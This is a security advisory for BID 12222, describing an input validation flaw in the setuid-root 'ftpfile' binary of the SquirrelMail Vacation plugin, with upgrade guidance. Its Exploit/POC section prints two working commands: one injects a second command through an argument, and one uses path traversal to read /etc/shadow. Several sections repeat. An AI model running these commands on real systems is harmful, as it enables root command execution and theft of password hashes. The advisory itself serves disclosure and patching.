SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
BID:12222
Info
SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
| Bugtraq ID: | 12222 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jan 11 2005 12:00AM |
| Updated: | Jan 11 2005 12:00AM |
| Credit: | Discovery is credited to Leon Juranic. |
| Vulnerable: |
SquirrelMail SquirrelMail Vacation Plugin 0.15 -1.43a SquirrelMail SquirrelMail Vacation Plugin 0.14 -1.2rc2 |
| Not Vulnerable: | |
Discussion
SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
The SquirrelMail Vacation plugin is prone to an input validation vulnerability. This issue exists in the 'ftpfile' binary, which is installed with setuid root privileges.
It is reported that 'ftpfile' may allow local attackers to execute commands or read files with superuser privileges.
The SquirrelMail Vacation plugin is prone to an input validation vulnerability. This issue exists in the 'ftpfile' binary, which is installed with setuid root privileges.
It is reported that 'ftpfile' may allow local attackers to execute commands or read files with superuser privileges.
Exploit / POC
SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
The following examples were provided:
(command execution)
ftpfile 0 root 0 get 0 "LSS-Security;id"
(file disclosure)
ftpfile localhost root root get ../../../../etc/shadow ./shadow
The following examples were provided:
(command execution)
ftpfile 0 root 0 get 0 "LSS-Security;id"
(file disclosure)
ftpfile localhost root root get ../../../../etc/shadow ./shadow
Solution / Fix
SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
Solution:
The SquirrelMail Project Team has released an upgrade for the affected plug-in that deals with this issue. users are strongly advised to upgrade.
SquirrelMail SquirrelMail Vacation Plugin 0.14 -1.2rc2
SquirrelMail SquirrelMail Vacation Plugin 0.15 -1.43a
Solution:
The SquirrelMail Project Team has released an upgrade for the affected plug-in that deals with this issue. users are strongly advised to upgrade.
SquirrelMail SquirrelMail Vacation Plugin 0.14 -1.2rc2
-
SquirrelMail Vacation 1.0
http://www.squirrelmail.org/countdl.php?fileurl=http%3A%2F%2Fwww.squir relmail.org%2Fplugins%2Fvacation_local-1.0-1.4.tar.gz
SquirrelMail SquirrelMail Vacation Plugin 0.15 -1.43a
References
SquirrelMail Vacation Plugin FTPFile Input Validation Vulnerability
References:
References:
- Vacation Home Page (SquirrelMail)
- Squirrelmail vacation v0.15 local root exploit (LSS Security
)